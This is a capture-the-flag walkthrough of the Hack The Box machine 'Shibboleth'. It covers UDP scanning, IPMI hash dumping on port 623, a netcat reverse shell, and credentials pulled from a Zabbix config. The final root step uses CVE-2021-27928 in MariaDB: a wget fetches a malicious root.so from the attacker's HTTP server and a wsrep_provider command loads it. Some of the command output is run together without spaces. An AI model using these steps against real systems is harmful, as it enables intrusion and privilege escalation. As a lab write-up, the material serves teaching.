Hmmm only 1 port is opened, strange, Let's try scanning UDP ports
└─$nmap-vvv-T4-sUshibboleth.htbIncreasingsenddelayfor10.129.98.77from0to50dueto11outof17droppedprobessincelastincrease.Warning:10.129.98.77givinguponportbecauseretransmissioncaphit (6).Increasingsenddelayfor10.129.98.77from200to400dueto11outof14droppedprobessincelastincrease.Increasingsenddelayfor10.129.98.77from400to800dueto11outof11droppedprobessincelastincrease.Nmapscanreportforshibboleth.htb (10.129.98.77)Hostisup,receivedecho-replyttl63 (0.21s latency).Scannedat2021-11-1400:50:23ESTfor1076sNotshown:993closedportsReason:993port-unreachesPORTSTATESERVICEREASON623/udpopenasf-rmcpudp-responsettl635555/udpopen|filteredrplayno-response8000/udpopen|filteredirdmino-response21167/udpopen|filteredunknownno-response30718/udpopen|filteredunknownno-response49175/udpopen|filteredunknownno-response49350/udpopen|filteredunknownno-responseReaddatafilesfrom:/usr/bin/../share/nmap# Nmap done at Sun Nov 14 01:08:19 2021 -- 1 IP address (1 host up) scanned in 1075.67 seconds
............and yess there are some udp ports open
Zabbix is an open-source monitoring software tool for diverse IT components, including networks, servers, virtual machines and cloud services. Zabbix provides monitoring metrics, among others network utilization, CPU load and disk space consumption
Get login details
So I tried with some Web Attacks to login but none of them worked, The UDP port 623 will get us some hashes
Learn
The UDP port 623 is vulnerable : https://book.hacktricks.xyz/pentesting/623-udp-ipmi
Login creds
I've used the Metasplot way to get the hashes because it was easy
└─$nc-nvlp9002listeningon [any] 9002 ...connectto [10.10.14.47] from (UNKNOWN) [10.129.99.116] 40614sh:0:can't access tty; job control turned off$ whoami zabbix
As there were no SSH ports open we don't get any stabalize shell, let's get work with this shell
Get User flag / escalting user privileges
# Use the zabbix login creds to get ipmi-svc userzabbix@shibboleth$suipmi-svcpassword:ilovepumkinpie1ipmi-svc@shibboleth$cat/home/ipmi-svc/user.txt<--SNIP-->
So the DB information was stored in /etc/zabbix/zabbix_server.conf
ipmi-svc@shibboleth:/etc$cat/etc/zabbix/zabbix_server.conf|grep-C2-i"password"<zabbix/zabbix_server.conf |grep-C2-i"password"DBUser=zabbix### Option: DBPassword# Database password.# Comment this line if no password is used.## Mandatory: no# Default:DBPassword=bloooarskybluh
Now we have the username and password [ zabbix : bloooarskybluh ]
MySQL enumeration
As ipmi-svc user was not in the sudoers list GTFO bins is not helpful
ipmi-svc@shibboleth:/etc$mysql-Vmysql-VmysqlVer15.1Distrib10.3.25-MariaDB,fordebian-linux-gnu (x86_64) using readline 5.2
So the version is : 10.3.25
Link : https://www.cvedetails.com/vulnerability-list/vendor_id-12010/Mariadb.html
The first CVE has 9.0 score [ CVE-2021-27928 ]
Let's get the root
Link : https://packetstormsecurity.com/files/162177/MariaDB-10.2-Command-Execution.html
I've used python http server and wget to download the payload
python3 -m http.server 80 [ Attacker ]
wget http://<your_ip>/root.so [ Victim ]
Setup a nc listener
# Login with creds we got earlier ipmi-svc@shibboleth:~$mysql-uzabbix-pbloooarskybluh-hlocalhost-e'SET GLOBAL wsrep_provider="/tmp/root.so";'<host -e 'SET GLOBAL wsrep_provider="/tmp/root.so";'ERROR2013 (HY000) at line 1: Lost connection to MySQL server during query